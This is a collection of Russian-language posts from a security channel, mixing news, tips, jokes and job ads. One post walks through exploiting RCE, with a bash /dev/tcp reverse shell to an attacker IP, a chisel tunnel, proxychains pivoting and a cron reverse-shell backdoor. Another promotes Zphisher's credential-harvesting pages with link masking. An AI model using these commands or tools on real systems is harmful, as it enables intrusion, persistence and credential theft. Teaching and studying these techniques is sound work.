🎯 Инструмент в арсенал тестировщика безопасности

Zphisher — автоматизированный фреймворк для фишинга, идеально подходящий для этических тестов безопасности и повышения осведомлённости о социальных атаках.

Что делает:

📍 Имеет 60+ готовых шаблонов фишинговых страниц — от классических Facebook* и Instagram* до PayPal и GitHub.

📍 Полностью автоматизирует процесс создания фальш-сайта: всё, что нужно — выбрать цель, запустить скрипт, получить ссылку.

📍 Поддержка Ngrok, Localhost run, Cloudflare tunnels для создания внешнего доступа — даёт возможность тестировать удалённо без белого IP.

📍 Минималистичный интерфейс в CLI — подходит даже тем, кто “видит консоль в первый раз и уже хочет уволиться”.

📍 Моментальный захват данных: логины, пароли, IP-адрес жертвы и иногда даже геолокацию.

Фишки, о которых мало кто говорит:

➡️ В некоторых шаблонах реализован автоматический редирект на реальный сайт после ввода данных — пользователь даже не поймет, что только что слил свои пароли.

➡️ Работает на Termux на Android — можно проводить тестирование буквально с телефона.

➡️ Есть режим маскировки ссылок через сторонние сервисы — чтобы ссылка выглядела ещё более правдоподобно.

Использование вне разрешённых сценариев — прямой путь к уголовной ответственности. Работайте головой, а не только руками.

🔗 Источник: GitHub проекта

*Meta признана экстремистской организацией в РФ

🐸 Библиотека хакера

#буст

⚡️ Онлайн-полигоны как тренажёр для киберзащиты: опыт банка в реальных сценариях

Что делать, если реальных атак немного, но быть к ним готовым нужно на 100%? В Банке «Санкт-Петербург» выбрали путь практики — участие в онлайн-учениях Standoff Defend.

📌 Цель: не просто проверить знания, а убедиться, что специалисты умеют реагировать быстро, точно и слаженно в условиях, приближённых к реальным инцидентам.

🟥Это была проверка на прочность — с фокусом на работу в SIEM, расследование сложных кейсов и построение цепочек атак.

Что получили на выходе:

— Сложные, многослойные сценарии с ложными следами и неожиданными поворотами.

— Реальные подходы хакеров: обход периметра, маскировка под легитимный трафик, работа в стиле APT-группировок.

— Рост уверенности в команде при анализе логов и реагировании на инциденты.

— Понимание, где сильны, а где нужно усилить экспертизу.

Standoff Defend стал для команды не просто тренажёром, а полноценной платформой развития. Это как симулятор полётов для пилота — учит действовать в стрессовых условиях без риска для бизнеса.

«После полигона команда вышла на новый уровень. Это как после тренажёра — ты уже умеешь держать удар».

— Александр Дорофеев, начальник отдела мониторинга и реагирования на инциденты ИБ

🔗 Оригинал статьи

🐸 Библиотека хакера

#свежак

✏️ Как быстро оформить отчёт об уязвимости: промпт для ChatGPT

Пентест — это не только найти дыру, но и грамотно донести ее до заказчика или баг-баунти платформы. А составлять отчет — задача неблагодарная: муторно, долго, да ещё и Markdown забывается в самый нужный момент.

Чтобы не тратить время на шаблоны и формулировки, вот промпт, который делает все за вас:

🔴 PROMPT:

Write a bug bounty report for the following reflected XSS: [вставьте PoC]. Include: Title, VRT, CVSS, Description, Impact, PoC, and recommended Fix. Use Markdown.

Что получаем на выходе:

1️⃣ Заголовок с категорией уязвимости

2️⃣ Описание и вектор атаки

3️⃣ CVSS-оценка

4️⃣ Proof-of-Concept

5️⃣ Рекомендации по устранению

Можно использовать не только для XSS, но и для SQLi, IDOR, CSRF и других находок — просто адаптируй PoC и вуаля.

🔗 Источник

🐸 Библиотека хакера

#буст

— SOC 2?
— Не, брат, у меня просто восемь звёздочек 🙂

🐸 Библиотека хакера

#развлекалово

❓ Как узнать, хранятся ли пароли в базе в открытом виде

Это один из самых тревожных и, увы, до сих пор реальных сценариев: ты нашёл базу данных и хочешь понять, насколько безответственно там обращаются с паролями. Вот как быстро это проверить.

Шаги:

1️⃣ Получи дамп базы данных

Если ты на этапе баг-баунти — это может быть через SQL-инъекцию или доступ к резервным копиям. Мы не поощряем взлом — только разрешённое тестирование.

2️⃣ Найди таблицу с пользователями

Обычно: users, accounts, members, login, auth.

3️⃣ Посмотри, как выглядят пароли

📍 Если поле password содержит строки типа 123456, admin, qwerty — это plaintext.

📍 Если строки длинные, с миксом символов, возможно это хеши (например, bcrypt, MD5, SHA-1).

4️⃣ Протестируй предположения:

📍 Сравни хеши с публичными словарями через CrackStation.

📍 Или используй hashid / hash-identifier для определения типа хеша.

📍 Для брутфорса попробуй John the Ripper или Hashcat.

5️⃣ Проверь наличие соли

Если у всех пользователей одинаковый пароль, но хеши разные — скорее всего, применяется соль. Это хорошо. Если хеши совпадают — соль не используется. Это плохо.

❗️ Что не стоит делать:

— Не публикуй реальные дампы или пароли — это нарушение этики и закона.

— Не используй полученные данные за пределами согласованных условий пентеста.

🐸 Библиотека хакера

#буст

💻 BYOD: гибкость или дыра

Тебе говорят:

«Разрешим сотрудникам работать с личных устройств — пусть будет удобно!»

И вот уже backend-инженер пушит в репу с iPad-а, дизайнер гоняет макет с домашнего ноута, а кто-то подключается к корпоративной Wi-Fi с телефона, где стоит TikTok, Telegram, торренты и три анонимных VPN-а.

➡️ BYOD (Bring Your Own Disaster)

Плюсы:

🟥 Сотрудникам не нужно переключаться между устройствами + быстрое подключение новых людей, особенно на фриланс и аутсорс

🟥 Снижает затраты на оборудование

Минусы:

🟥 Shadow IT и потеря контроля + личные устройства часто без шифрования, антивируса и актуальных патчей

🟥 Уходящий сотрудник уносит данные с собой

➡️ Жесткий запрет BYOD

Плюсы:

🟥 Полный контроль — устройства корпоративные, MDM стоит, доступ — по роли

🟥 Проще соблюдать стандарты (ISO, GDPR, SOC2)

Минусы:

🟥 Больше затрат на закупку и поддержку железа + долгий онбординг, особенно в удалённой среде

BYOD — это как звать людей на вечеринку с их алкоголем. Да, дешевле. Но кто потом будет разбираться, кто разбил стекло, кто выключил сигнализацию и кто унес с собой флешку с исходниками?

А у вас в компании как? Делитесь практиками в комментах ✏️

🐸 Библиотека хакера

#междусобойчик

🌸 Быстрый повтор запроса в Repeater

Ctrl + R — отправляет текущий запрос из Proxy, HTTP history или Intruder прямо в Repeater.

Зачем это нужно:

• Мгновенно переключиться к ручному редактированию запроса.

• Позволяет точно тестировать различные payload’ы и видеть, как сервер реагирует.

• Удобно при исследовании уязвимостей типа IDOR, XSS, SQLi.

Пример сценария:

1. Перехватил запрос в Proxy.

2. Видишь интересный параметр в GET-запросе.

3. Нажал Ctrl + R — и он уже в Repeater, где можно экспериментировать с инъекциями.

💡 В Repeater также можно использовать Ctrl + Shift + L — для отправки всех табов одним кликом, если проверяешь цепочку запросов.

🐸 Библиотека хакера

#буст

🛡️ Премия для этичных хакеров открыла прием заявок

Каждый год хакеры соревнуются не только в CTF и баунти, но и за престиж. Pentest Award — это премия для тех, кто не просто нашёл баг, а сделал это красиво, эффективно и с пользой. Организатор — компания «Авилликс».

В 2025 году номинаций стало больше, и теперь каждый найдёт своё поле боя:

➖ «Пробив WEB» — за филигранный взлом веб-приложений.

➖ «Раз bypass, два bypass» — за нестандартные методы обхода защит.

➖ «Ловись рыбка» — за топовые фишинговые сценарии.

Новые категории:

*️⃣ «Мобильный разлом» — пентест Android/iOS,
*️⃣ «Девайс» — атаки на IoT и железо,
*️⃣ «Out of Scope» — творческий выход за рамки,
*️⃣ «Осторожно, грабли!» — за болезненные, но поучительные фейлы.

Сколько стоит и что получите:

➡️ Участие бесплатное. Приём заявок — до 1 августа 2025 года.

➡️ Призы: MacBook, iPhone, билеты на OFFZONE и признание сообщества.

🔗 Подробнее и подать заявку

🐸 Библиотека хакера

#свежак

🐸 Библиотека хакера

#развлекалово

🥺 Что такое CVE-2023-20198 и почему это страшно

Это критическая дыра в Cisco IOS XE — прошивке, которую используют маршрутизаторы и коммутаторы.

➡️ Веб-интерфейс управления не проверяет как следует, кто именно шлёт запрос. И даже если ты обычный юзер с минимальными правами, можно сделать хитрый запрос — и стать админом.

Что можно после взлома:

• Добавлять/удалять пользователей

• Выполнять команды через CLI

• Полностью управлять устройством

💡 Как защититься:

Обновить прошивку. Никаких патчей — только апдейт.

🐸 Библиотека хакера

#междусобойчик

📣 Подборка основных направлений пентестинга в 2025 году

📍 Веб-пентестинг и фреймворки

Знание их особенностей безопасности становится критически важным для пентестеров. Кроме того, использование Shodan позволяет обнаруживать скрытые ресурсы без доменных имен, расширяя возможности разведки.

📍 Интеграция ИИ в пентестинг

Системы, такие как PenTest++, интегрируют генеративный ИИ для оптимизации рабочих процессов, включая разведку, сканирование и эксплуатацию уязвимостей. Это позволяет ускорить рутинные задачи, оставляя больше времени для стратегического анализа.

📍 Пентест в финансовом секторе

Пентест в финансовом секторе фокусируется на сложной инфраструктуре и строгих регуляциях. ИИ и автоматические системы помогают быстро выявлять угрозы, а тестирование ИИ-моделей направлено на предотвращение мошенничества.

🐸 Библиотека хакера

#свежак

❓ Из чего состоит модель CIA

CIA, или триада ЦРУ, — это модель политики ИБ компании.

Состоит из трех компонентов:

• конфиденциальность — это перечень нормативов, которые ограничивают доступ к информации компании; 

• целостность — гарантия достоверности и точности информации; 

• доступность — возможность сотрудникам с правом доступа пользоваться данными. 

👍 — если уже знал/а ответ
🌚 — узнал/а новое

🐸 Библиотека хакера

#междусобойчик

💛 Топ-вакансий для хакеров за неделю

Middle/Senior Application Security Engineer — от 250 000 ₽, удаленно (Москва)

Инженер по информационной безопасности — от 160 000 ₽, офис (Екатеринбург)

Pentester в RedTeam команду — 150 000 - 300 000 ₽, удаленно (Москва)

Специалист по информационной безопасности — от 157 500 ₽ , офис (Казань)

Information Security Specialist (Middle) — офис (Санкт-Петербург)

➡️ Еще больше топовых вакансий — в нашем канале InfoSec jobs

🐸 Библиотека хакера

#свежак

❓ Как получить доступ к внутренней сети через уязвимый веб-сервер

Пошаговая инструкция эксплуатации уязвимости RCE с пивотингом во внутреннюю инфраструктуру.

1️⃣ Сканируем на наличие RCE

➡️ Используем nmap с NSE-скриптами:

nmap -p 80,443 --script http-vuln* <target_ip>

➡️ Проводим ручной fuzzing параметров через:

— ffuf / wfuzz
— Burp Suite Repeater
— curl с параметрами вида:

curl "http://target.com/test.php?cmd=id"

⚠️ Многие RCE не обнаруживаются автоматикой — критично вручную проверить подозрительные поля на injection, command chaining (&&, |, ;), base64.

2️⃣ Эксплуатируем уязвимость

Если выполнение подтверждено (например, id, uname -a), готовим обратную оболочку.

➡️ Используем наиболее совместимый вариант — bash или nc:

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1'

➡️ Варианты на случай отсутствия bash:

— python3 -c 'import socket,os,...'
— php -r '...reverse shell...'
— perl, nc -e, curl | sh — в зависимости от окружения


3️⃣ Получаем доступ и готовим туннель

➡️ Слушаем на своей машине:

nc -lvnp 4444

➡️ Получив оболочку, загружаем туннелирование-инструмент:

Например, chisel:

# На атакующей машине
chisel server -p 8000 --reverse

# На целевой (из полученной shell)
./chisel client <attacker_ip>:8000 R:1080:socks

⚠️ Компилируй chisel под ОС и архитектуру цели (GOOS=linux GOARCH=amd64 или windows/386 и т.д.)

4️⃣ Пивотинг во внутреннюю сеть

➡️ Используем proxychains:

Настрой файл /etc/proxychains.conf на:

socks5 127.0.0.1 1080

➡️ Проверяем доступность внутренних хостов:

proxychains nmap -sT -Pn -p 80,443 10.0.0.0/24

⚠️ Только TCP, только -sT. Для UDP/ICMP — использовать socat или meterpreter route.

5️⃣ Укрепляем доступ

➡️ Ставим бекдор для повторного входа:

- cronjob: * * * * * bash -i >& /dev/tcp/<ip>/4444 0>&1

- systemd: .service с автозапуском

- загрузка агента Metasploit

- использование ssh-keygen и подмена .ssh/authorized_keys

🧠 Примечания:

• Проверяй антивирусы, EDR, IDS — chisel, meterpreter, nc часто палятся.
• Под каждую цель адаптируй инструменты: Windows = PowerShell и plink; Linux = socat, bash.

⚠️ Disclaimer:

Все действия описаны исключительно в образовательных целях. Проведение описанных операций без разрешения владельца системы является нарушением закона.

🐸 Библиотека хакера

#буст

💛 Android пропускает атаку в фоне, пока ты читаешь эту новость

Google выпустила майский патч безопасности Android — устранил 46 уязвимостей, но одна из них уже используется в атаках.

CVE-2025-27363 (CVSS 8.1) — критическая дыра в библиотеке FreeType, позволяет выполнить код без взаимодействия с пользователем. Ошибка устранена в FreeType 2.13.0+.

Обновление от 5 мая устраняет также баги в ядре, фреймворке, GPU PowerVR, ARM Mali, модемах MediaTek и чипах Qualcomm.

Теперь Android — это не только прошивка. Безопасность зависит от Google Play Protect и Project Mainline. Проверьте, актуален ли ваш патч 🏃‍♀️

🔗 Читай подробнее в статье

🐸 Библиотека хакера

#свежак

📌 Команда дня для отслеживания попыток входа

Эта команда позволяет мониторить файл аутентификации в режиме реального времени, фильтруя события, связанные с SSH:

tail -f /var/log/auth.log | grep ssh

🔘 tail -f — выводит новые строки по мере их появления.

🔘 grep ssh — фильтрует только те строки, которые содержат информацию об SSH.

Используется для:

• Отслеживания попыток подключения по SSH.

• Выявления неудачных попыток входа.

• Мониторинга активности пользователей.

🐸 Библиотека хакера

#буст

🐸 Библиотека хакера

#развлекалово